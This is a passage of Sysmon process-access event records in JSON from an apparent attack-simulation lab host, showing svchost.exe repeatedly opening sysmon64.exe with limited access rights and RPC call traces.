ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3630,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 